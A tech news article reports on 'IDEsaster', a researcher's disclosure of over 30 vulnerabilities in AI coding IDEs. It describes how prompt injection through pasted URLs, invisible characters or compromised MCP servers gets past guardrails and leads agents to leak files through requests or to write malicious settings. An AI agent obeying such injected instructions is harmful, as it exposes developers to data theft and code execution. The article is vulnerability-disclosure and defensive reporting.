Connect with us

Hi, what are you looking for?

AI Cybersecurity

Researchers Identify 30+ Vulnerabilities in AI IDEs, Exposing Data Theft Risks

Over 30 critical vulnerabilities, collectively dubbed “IDEsaster,” have been uncovered in AI IDEs like GitHub Copilot and Cursor, risking severe data theft and remote code execution.

Dec 06, 2025Ravie LakshmananAI Security / Vulnerability

Over 30 security vulnerabilities have been disclosed in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs), posing significant threats through data exfiltration and remote code execution. Security researcher Ari Marzouk (MaccariTA) has collectively named these issues IDEsaster, affecting popular IDEs and extensions such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline. Among these, 24 vulnerabilities have been assigned CVE identifiers.

Marzouk expressed his surprise at the research findings, noting, “All AI IDEs (and coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model.” He emphasized that the integration of AI agents complicates the security landscape, as previously trusted features can now be weaponized for attacks.

The vulnerabilities exploit a combination of three vectors common to AI-driven IDEs: the ability to bypass a large language model’s (LLM) guardrails, execute actions autonomously through approved tool calls, and leverage legitimate IDE features to leak sensitive data or execute arbitrary commands. This multifaceted approach significantly deviates from traditional attack chains, which usually relied on modifying an AI agent’s configuration.

The core of the IDEsaster vulnerabilities lies in exploiting prompt injection techniques. These can be initiated through seemingly innocuous user-added context, such as pasted URLs or invisible characters. Attackers can also pollute the context by using Model Context Protocol (MCP) servers that have been compromised.

Specific attacks enabled by this exploit chain include reading sensitive files or executing commands via legitimate IDE features. Notable CVEs include CVE-2025-49150 affecting Cursor and CVE-2025-53097 concerning Roo Code, both allowing adversaries to exfiltrate data when an IDE makes a GET request to a malicious domain.

Other examples involve modifying IDE settings files to achieve code execution, such as CVE-2025-53773 impacting GitHub Copilot and CVE-2025-54130 targeting Cursor. These attacks leverage the auto-approval feature of AI agents, allowing malicious actors to write harmful workspace settings without user interaction.

Marzouk’s recommendations for developers include using AI IDEs only with trusted projects and files, connecting to reliable MCP servers, and manually scrutinizing context references for hidden instructions. He advocates for a security-first approach in the development of AI agents, emphasizing the need to apply the principle of least privilege, minimize potential injection vectors, and perform rigorous security testing.

The disclosure of these vulnerabilities aligns with the discovery of multiple issues in other AI coding tools. For instance, OpenAI Codex CLI has a command injection flaw (CVE-2025-61260) that could allow unauthorized command execution due to the program’s reliance on unverified commands from MCP server entries. Similarly, Google Antigravity has been found to possess vulnerabilities that may lead to credential harvesting and data exfiltration through indirect prompt injections.

As AI tools increasingly gain traction in enterprise environments, these findings underscore the evolving threat landscape. According to Aikido researcher Rein Daelman, any repository utilizing AI for tasks like issue triage or automated responses is exposed to risks such as prompt injection and command execution. Marzouk highlighted the importance of adopting a “Secure for AI” framework to address these emerging vulnerabilities, advocating for security measures that prioritize AI components from the outset.

This emerging paradigm underscores the necessity of developing AI tools that are secure by design, as they increasingly contribute to the attack surface of development environments. “Connecting AI agents to existing applications creates new emerging risks,” Marzouk warned, reiterating the critical need for vigilance in an era where AI technologies are rapidly evolving.

See also
Rachel Torres
Written By

At AIPressa, my work focuses on exploring the paradox of AI in cybersecurity: it's both our best defense and our greatest threat. I've closely followed how AI systems detect vulnerabilities in milliseconds while attackers simultaneously use them to create increasingly sophisticated malware. My approach: explaining technical complexities in an accessible way without losing the urgency of the topic. When I'm not researching the latest AI-driven threats, I'm probably testing security tools or reading about the next attack vector keeping CISOs awake at night.

You May Also Like

AI Cybersecurity

Nomani investment scams surged 62% as ESET reported over 64,000 blocked URLs, utilizing AI deepfakes to mislead victims into financial loss.

AI Business

Lovable secures $330M in funding, boosting valuation to $6.6B, with Nvidia and Alphabet backing its innovative 'vibe coding' platform.

AI Tools

AI tools like Microsoft's CoPilot boost developer productivity by 76%, but raise quality concerns as output surges without clear metrics on code integrity.

AI Tools

Cursor launches Vibe, an AI-driven visual editor designed to simplify coding and design processes, enhancing productivity for developers and novices alike.

AI Cybersecurity

Researchers uncover over 30 security vulnerabilities in AI coding tools like GitHub Copilot, risking data theft and remote code execution for developers.

Top Stories

University of Kentucky partners with Microsoft to implement a statewide AI strategy, enhancing education and health care through advanced tools like GitHub and Dragon...

AI Business

Two Cents Software launches a SaaS boilerplate for $399, streamlining MVP development with AI-optimized features and over 40 premium React components.

© 2025 AIPressa · Part of Buzzora Media · All rights reserved. This website provides general news and educational content for informational purposes only. While we strive for accuracy, we do not guarantee the completeness or reliability of the information presented. The content should not be considered professional advice of any kind. Readers are encouraged to verify facts and consult appropriate experts when needed. We are not responsible for any loss or inconvenience resulting from the use of information on this site. Some images used on this website are generated with artificial intelligence and are illustrative in nature. They may not accurately represent the products, people, or events described in the articles.